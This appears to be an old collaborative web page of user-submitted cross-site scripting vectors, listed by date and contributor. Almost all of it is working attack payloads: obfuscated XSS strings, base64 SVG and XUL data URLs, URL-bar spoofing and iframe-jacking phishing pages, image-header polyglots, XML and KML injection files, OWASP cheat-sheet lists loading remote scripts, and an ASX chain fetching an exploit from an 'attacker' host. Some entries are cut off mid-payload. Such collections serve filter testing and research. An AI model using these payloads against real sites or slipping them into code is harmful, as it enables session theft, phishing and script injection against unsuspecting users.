Attack Vectors Sender

Attack Vectors Sender
(:: Vecteur d'attaque XSS ::)

Cliquez ici pour envoyer votre vecteur

June 18, 2011 - 06:33 PM
p3lo thx Mario Heiderich work 2

<img src="Mario Heiderich says: svg SHOULD not be executed trough html img tags" onerror="javascript:document.write('u003cu0069u0066u0072u0061u006du0065u0020u0073u0072u0063u003du0022u0064u0061u0074u0061u003au0069u006du0061u0067u0065u002fu0073u0076u0067u002bu0078u006du006cu003bu0062u0061u0073u0065u0036u0034u002cu0050u0048u004eu0032u005au0079u0042u0034u0062u0057u0078u0075u0063u007au0030u0069u0061u0048u0052u0030u0063u0044u006fu0076u004cu0033u0064u0033u0064u0079u0035u0033u004du0079u0035u0076u0063u006du0063u0076u004du006au0041u0077u004du0043u0039u007au0064u006du0063u0069u0050u0069u0041u0067u0043u0069u0041u0067u0049u0044u0078u0070u0062u0057u0046u006eu005au0053u0042u0076u0062u006du0078u0076u0059u0057u0051u0039u0049u006du0046u0073u005au0058u004au0030u004bu0044u0045u0070u0049u006au0034u0038u004cu0032u006cu0074u0059u0057u0064u006cu0050u0069u0041u0067u0043u0069u0041u0067u0049u0044u0078u007au0064u006du0063u0067u0062u0032u0035u0073u0062u0032u0046u006bu0050u0053u004au0068u0062u0047u0056u0079u0064u0043u0067u0079u004bu0053u0049u002bu0050u0043u0039u007au0064u006du0063u002bu0049u0043u0041u004bu0049u0043u0041u0067u0050u0048u004eu006au0063u006du006cu0077u0064u0044u0035u0068u0062u0047u0056u0079u0064u0043u0067u007au004bu0054u0077u0076u0063u0032u004eu0079u0061u0058u0042u0030u0050u0069u0041u0067u0043u0069u0041u0067u0049u0044u0078u006bu005au0057u005au007au0049u0047u0039u0075u0062u0047u0039u0068u005au0044u0030u0069u0059u0057u0078u006cu0063u006eu0051u006fu004eu0043u006bu0069u0050u006au0077u0076u005au0047u0056u006du0063u007au0034u0067u0049u0041u006fu0067u0049u0043u0041u0038u005au0079u0042u0076u0062u006du0078u0076u0059u0057u0051u0039u0049u006du0046u0073u005au0058u004au0030u004bu0044u005...

June 18, 2011 - 06:08 PM
p3lo thx Mario Heiderich work

SVG VECTOR javascript execution variant using data protocol.
data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPiAgCiAgIDxpbWFnZSBvbmxvYWQ9ImFsZXJ0KDEpIj48L2ltYWdlPiAgCiAgIDxzdmcgb25sb2FkPSJhbGVydCgyKSI+PC9zdmc+ICAKICAgPHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0PiAgCiAgIDxkZWZzIG9ubG9hZD0iYWxlcnQoNCkiPjwvZGVmcz4gIAogICA8ZyBvbmxvYWQ9ImFsZXJ0KDUpIj4gIAogICAgICAgPGNpcmNsZSBvbmxvYWQ9ImFsZXJ0KDYpIiAvPiAgCiAgICAgICA8dGV4dCBvbmxvYWQ9ImFsZXJ0KDcpIj48L3RleHQ+ICAKICAgPC9nPiAgCjwvc3ZnPiAg

March 01, 2010 - 01:43 PM
p3Lo

Urlbar spoof with ASCII Hexa encoding
<a href="http://%67%6F%6F%67%6C%65%2E%63%6F%6D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20">http://google.com</a>

March 01, 2010 - 08:31 AM
p3lo thx Jordie Chancel

Data control url spoofing with frame jacking payload

it works better if the content is url encoded ;)

data:europasecurity.org %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20;html,%3Cbody%20TOPMARGIN%3D%220%22%20LEFTMARGIN%3D%220%22%20MARGINWIDTH%3D%220%22%20MARGINHEIGHT%3D%220%22%3E%3C%21--iframe%20isnt%20a%20fake%20site--%3E%3Ciframe%20src%3D%22http%3A%2f%2feuropasecurity.org%22%20name%3D%22poc%20iframe%20jacking%22%20width%3D%22100%25%22%20height%3D%22100%25%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%3E%3C%2fiframe%3E%22%3B

March 01, 2010 - 08:19 AM
Jordie Chancel

data url spoofing
data:www.xxx.com%20%20%20%20%20%20%20%20;html,<h2>CONTENT</h2>";

November 30, 2009 - 12:22 AM
homeostasie(europa security) and p3Lo

Fun classical facebook app xss with an interesting hexadecimal breaker :

"/><iframe src= x27http://attackvector.free.fr/inj.xul></iframe>

October 29, 2009 - 06:30 AM
jungsonn

Here I use the ASCII decimal representation of the used header mime types.
You can find them all on my ASCII chart, if you don't know them.

GIF decimal header:
G = 71 I = 73 F = 70

JPG decimal header:
J = 74 P = 80 G = 71

PNG decimal header:
P = 80 N = 78 G = 71

So we can open up notepad on windows -I use leafpad on linux- and we can copy paste one of the following lines which will create a full header for that filetype. After the header we just type basic javascript which we want to execute. Then save the file with image extension, open it in MSIE and be amazed.

GIF:
%137%71%73%70%13%10%26%10%00%00%00%13%00%00%00%01% 00%00%00%01<script>alert('jungsonn');</script>

JPG:
%137%74%80%71%13%10%26%10%00%00%00%13%00%00%00%01% 00%00%00%01<script>alert('jungsonn');</script>

PNG:
%137%80%78%71%13%10%26%10%00%00%00%13%00%00%00%01% 00%00%00%01<script>alert('jungsonn');</script>

August 28, 2009 - 03:02 AM
p3lo thx voodoo-labs

xul xss
purified dataurl xul
data:application/xml;p3lo thx voodoo-labs.org,<w00t xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" onload="javascript:alert(1337)"/>

xul xss on event, with a w00t tag
<w00t xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" onload="javascript:alert(1337)"/>

xul xss (src attribute)(voodoo-labs.org)
<xul:browser src="javascript:alert(1)" xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"/>

August 28, 2009 - 02:53 AM
p3lo thx voodoo-labs

Xul dataurl by p3lo (thx voodoo-labs for the xss)

Xul xss xml in base64
data:application/xml;base64,PHdpbmRvdyB4bWxucz0iaHR0cDovL3d3dy5tb3ppbGxhLm9yZy9rZXltYXN0ZXIvZ2F0ZWtlZXBlci90aGVyZS5pcy5vbmx5Lnh1bCI+PGJyb3dzZXIgc3JjPSJqYXZhc2NyaXB0OmFsZXJ0KDEzMzcpOyIvPjwvd2luZG93Pg==

Variante Xul xss 1
data:application/xml;p3lo thx voodoo-labs.org,%3Cwindow%20xmlns%3D%22http%3A%2f%2fwww.mozilla.org%2fkeymaster%2fgatekeeper%2fthere.is.only.xul%22%3E%3Cbrowser%20src%3D%22javascript%3Aalert%281337%29%3B%22%2f%3E%3C%2fwindow%3E

variante xul xss 2
data:application/xml;p3lo thx voodoo-labs.org,%3Cxul%3Abrowser%20src%3D%22javascript%3Aalert%281%29%22%20xmlns%3Axul%3D%22http%3A%2f%2fwww.mozilla.org%2fkeymaster%2fgatekeeper%2fthere.is.only.xul%22%2f%3E

obfuscated xul xss utf7 en base64
data:application/xml;charset=utf-7;base64,K0FEdy13aW5kb3cgeG1sbnMrQUQwQUlnLWh0dHA6Ly93d3cubW96aWxsYS5vcmcva2V5bWFzdGVyL2dhdGVrZWVwZXIvdGhlcmUuaXMub25seS54dWwrQUNJQVBnQTgtYnJvd3NlciBzcmMrQUQwQUlnLWphdmFzY3JpcHQ6YWxlcnQoMTMzNykrQURzQUlnLS8rQUQ0QVBBLS93aW5kb3crQUQ0

August 08, 2009 - 07:02 PM
p3lo

Victim server launch the attack to the victim client.
http://victimserver/vuln.html?param=http://attacker/exploit.asx

exploit.asx
<ASX Version="3.0">
<title></title>
<Entry>
<author></author>
<copyright></copyright>
<ref href="http://attacker/videolol.wmv?SAMI=http://pwn2.com/RSO.smi"></ref>
</Entry>
</ASX>

Rso.smi will contain the Sami remote stack overflow exploit.

July 10, 2009 - 07:06 AM
p3lo

javascript:document.write(unescape("x3cx73x63x72x69x70x74x3ex61x6cx65x72x74x28x22x66x72x68x61x63x6bx22x29x3cx2fx73x63x72x69x70x74x3e"))

June 11, 2009 - 03:18 AM
PHPIDS

XML INJECTION IN ENTITY
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [
<!ENTITY inject "<script>alert(1)</script>">
]>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Test</title>
</head>

<body>
&inject;
</body>
</html>

June 09, 2009 - 06:02 AM
p3lo

Parameter pollution

param=<script¶m=src=”....”>

June 05, 2009 - 12:11 AM
p3lo

Xml injection on google gadgets domain

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Google Talk"
description="See your contacts and send instant messages."
author="Google Talk Team"
author_affiliation="Google, Inc."
author_location="Kirkland, WA"
screenshot="http://talkgadget.google.com/talkgadget/googletalk.png"
thumbnail="http://talkgadget.google.com/talkgadget/googletalk-thm.png"
category="communication"
category2="tools"
height="451"
render_inline="optional">
<Locale lang="en" country="us"/>
</ModulePrefs>
<Content type="html"><![CDATA[<script>document.write(unescape("%3Ca%20href%3D%22http%3A%2F%2Fattackvector.lescigales.org%2Flinkslien%2F%22%3E%3Ccenter%3E%3Ch1%3Ep3lo%3C%2Fh1%3E%3C%2Fcenter%3E%3C%2Fa%3E%3Ccenter%3E%3Ch1%3Ewas%20here%3C%2Fh1%3E%3C%2Fcenter%3E"));</script>>]]>
</Content>
</Module>

June 04, 2009 - 06:50 AM
p3lo

hard reading xss vector
javascript:document.write(String.fromCharCode(1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+0, 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+0, 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+0, 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+0, 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+0, 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+0, 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+0, 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+0, 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+0, 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+...

May 24, 2009 - 05:41 AM
p3Lo

New data url vectors by p3lo

Works on firefox and chromium based browsers:

Url encoded vectors:
data:text/html;charset=iso-8859-1,%3Cscript%3Ealert%28501337%29%3C/script%3E
data:text/html;charset=iso-8859-2,%3Cscript%3Ealert%28501337%29%3C/script%3E
data:text/html;charset=iso-50,%3Cscript%3Ealert%28501337%29%3C/script%3E
data:text/html;charset=1337,%3Cscript%3Ealert%28501337%29%3C/script%3E
data:text/html;charset=woot,%3Cscript%3Ealert%28501337%29%3C/script%3E
data:p3lo/html;damn its malicious!,%3Cscript%3Ealert%28501337%29%3C/script%3E

data:text/html;charset=iso-8859-1,<script>alert(501337)</script>
data:text/html;charset=iso-8859-2,<script>alert(501337)</script>
data:text/html;charset=iso-50,<script>alert(501337)</script>
data:text/html;charset=1337,<script>alert(501337)</script>
data:text/html;charset=woot,<script>alert(501337)</script>
data:text/html;damn its malicious!,<script>alert(501337)</script>

data url concatenation
data:text/html;charset=iso-8859-15,<script>alert(501337)</script>data:text/html;charset=iso-8859-6,<script>alert(501337)</script>data:text/html;charset=iso-8859,<script>alert(501337)</script>data:text/html;charset=1337,<script>alert(501337)</script>data:text/html;charset=woot,<script>alert(501337)</script>data:text/html;damn its malicious!,<script>alert(501337)</script>

data url concatenation url encoded
data:text/html;charset=iso-8859-15,%3Cscript%3Ealert%28501337%29%3C/script%3Edata%3Atext/html%3Bcharset%3Diso-8859-6%2C%3Cscript%3Ealert%28501337%29%3C/script%3Edata%3Atext/html%3Bcharset%3Diso-8859%2C%3Cscript%3Ealert%28501337%29%3C/script%3Edata%3Atext/html%3Bcharset%3D1337%2C%3Cscript%3Ealert%28501337%29%3C/script%3Edata%3Atext/html%3Bcharset%3Dwoot%2C%3Cscript%3Ealert%28501337%29%3C/script%3Edata%3Atext/html%3Bdamn%20its%20malicious%21%2C%3Cscript%3Ealert%28501337%29%3C/script%3E

May 18, 2009 - 05:29 AM
p3lo

May 18, 2009 - 04:57 AM
p3lo

KML injection by p3lo, in the case where the kml file can be injected into the url like it:
http://site/foo.php?kmlurl=http://site2.com/file.kml

exploit.kml
<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Placemark>
<name>Simple placemark</name>
<description><![CDATA[ [<script>alert(1337)</script>]]></description>
<Point> <coordinates>-122.0822035425683,37.42228990140251,0</coordinates>
</Point>
</Placemark>
</kml>

May 18, 2009 - 04:49 AM
sla.ckers

123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);

May 18, 2009 - 04:29 AM
sla.ckers

May 18, 2009 - 04:15 AM
sla.ckers

May 18, 2009 - 04:04 AM
sla.ckers

function foo () {
var abc = '123456'.match(/(d)(d)/)
var def = window
}

function bar() {
console.dir(RegExp) //the regex info from foo()
console.dir(abc) //undefined
console.dir(def) //undefined
}

foo()
bar()

May 18, 2009 - 04:02 AM
p3lo

eval + unicode:
<script>x=eval,1,1,1;1;
1,1,1,b='',1,1,1;
1,1,1,s=''',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );</script>

May 18, 2009 - 03:50 AM
P3Lo

May 18, 2009 - 03:42 AM
P3Lo

May 18, 2009 - 03:39 AM
p3lo

May 18, 2009 - 03:35 AM
P3Lo

May 07, 2009 - 08:10 PM
p3Lo

owasp sheet 6
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");">
<style></script>
<![CDATA[</script>
<script>document.write("XSS-XSS-XSS");</script>
<<script>document.write("XSS-XSS-XSS");</script>
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");">
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");">
<xml src="javascript:document.write("XSS-XSS-XSS");">
<xml id="X"><a><b><script>document.write("XSS-XSS-XSS");</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[xC0][xBC]script>document.write("XSS-XSS-XSS");[xC0][xBC]/script>

May 07, 2009 - 08:08 PM
p3lo

owasp sheet 5
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");">
<style></script>
<![CDATA[</script>
<script>document.write("XSS-XSS-XSS");</script>
<<script>document.write("XSS-XSS-XSS");</script>
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");">
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");">
<xml src="javascript:document.write("XSS-XSS-XSS");">
<xml id="X"><a><b><script>document.write("XSS-XSS-XSS");</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
<a href="javascript#document.write("XSS-XSS-XSS");">
<div onmouseover="document.write("XSS-XSS-XSS");">
<img src="javascript:document.write("XSS-XSS-XSS");">
<img dynsrc="javascript:document.write("XSS-XSS-XSS");">
<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");">
<bgsound src="javascript:document.write("XSS-XSS-XSS");">
&<script>document.write("XSS-XSS-XSS");</script>
&{document.write("XSS-XSS-XSS");};
<img src=&{document.write("XSS-XSS-XSS");};>
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");">
<iframe src="vbscript:document.write("XSS-XSS-XSS");">
<img src="mocha:document.write("XSS-XSS-XSS");">
<img src="livescript:document.write("XSS-XSS-XSS");">
<a href="about:<script>document.write("XSS-XSS-XSS");</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");">
<body onload="document.write("XSS-XSS-XSS");">
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression(document.write("XSS-XSS-XSS"););">
<style type="text/javascript">document.write("XSS-XSS-XSS");</style>
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");...

May 07, 2009 - 08:06 PM
p3lo

owasp sheet 4

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="hntttp://6 6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<a href="javascript#document.write("XSS-XSS-XSS");">
<a href="javascript#document.write("XSS-XSS-XSS");">
<div onmouseover="document.write("XSS-XSS-XSS");">
<img src="javascript:document.write("XSS-XSS-XSS");">
<img dynsrc="javascript:document.write("XSS-XSS-XSS");">
<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");">
<bgsound src="javascript:document.write("XSS-XSS-XSS");">
&<script>document.write("XSS-XSS-XSS");</script>
&{document.write("XSS-XSS-XSS");};
<img src=&{document.write("XSS-XSS-XSS");};>
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");">
<iframe src="vbscript:document.write("XSS-XSS-XSS");">
<img src="mocha:document.write("XSS-XSS-XSS");">
<img src="livescript:document.write("XSS-XSS-XSS");">
<a href="about:<script>document.write("XSS-XSS-XSS");</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");">
<body onload="document.write("XSS-XSS-XSS");">
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.write("XSS-XSS-XSS"););">
<style type="text/javascript">document.write("XSS-XSS-XSS");</style>
<object classid="clsid:..." cod...

May 07, 2009 - 08:04 PM
p3lo

owasp sheet 3
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js...

May 07, 2009 - 08:00 PM
owasp

owasp sheet

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java script:alert("XSS")>";' > out
perl -e 'print "<SCR IPT>alert("XSS")</SCR IPT>";' > out
<IMG SRC=" javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/nalert(a.source)</SCRIPT>
";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@i...

May 07, 2009 - 07:40 PM
p3Lo

String.fromCharCode encoded xss vector,direct url cache poisoning.

javascript:document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 49, 51, 51, 55, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62))

May 02, 2009 - 09:18 PM
p3Lo

Iframe jacking javascript variants:

iFrame jacking with simple html escape encoding:

<script type="text/javascript">document.write(unescape("%3Cbody%20TOPMARGIN%3D%220%22%20LEFTMARGIN%3D%220%22%20MARGINWIDTH%3D%220%22%20MARGINHEIGHT%3D%220%22%3E%0A%3C%21--iframe%20isnt%20a%20fake%20site--%3E%0A%3Ciframe%20src%3D%22http%3A%2F%2Ffoo.proxy%22%20%20name%3D%22poc%20iframe%20jacking%22%20%20width%3D%22100%25%22%20height%3D%22100%25%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%3E%3C%2Fiframe%3E"));</script>

iFrame Jacking using write javascript function:

<script language="JavaScript" type="text/javascript">
';
str+='<iframe src="http://fu.proxy" name="poc iframe jacking" width="100%" height="100%" scrolling="auto" frameborder="no"></iframe>';
document.write(str);
}
writeJS();
//-->
</script>

Ajax asynchronous inline frame jacking:

<script>
function initialize() {
var testFrame =
document.createElement("IFRAME");
testFrame.id = "testFrame";
testFrame.src = "http://foo.proxy";
testFrame.setAttribute("width","100%");
testFrame.setAttribute("height","100%");
testFrame.setAttribute("frameborder","no");
testFrame.setAttribute("scrolling","auto");
testFrame.style.display = "none";
document.body.appendChild(testFrame);
}
</script>
<body onload="initialize()" TOPMARGIN="0" LEFTMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">

May 02, 2009 - 09:13 PM
p3Lo

Frame jacking with simple html escape encoding:

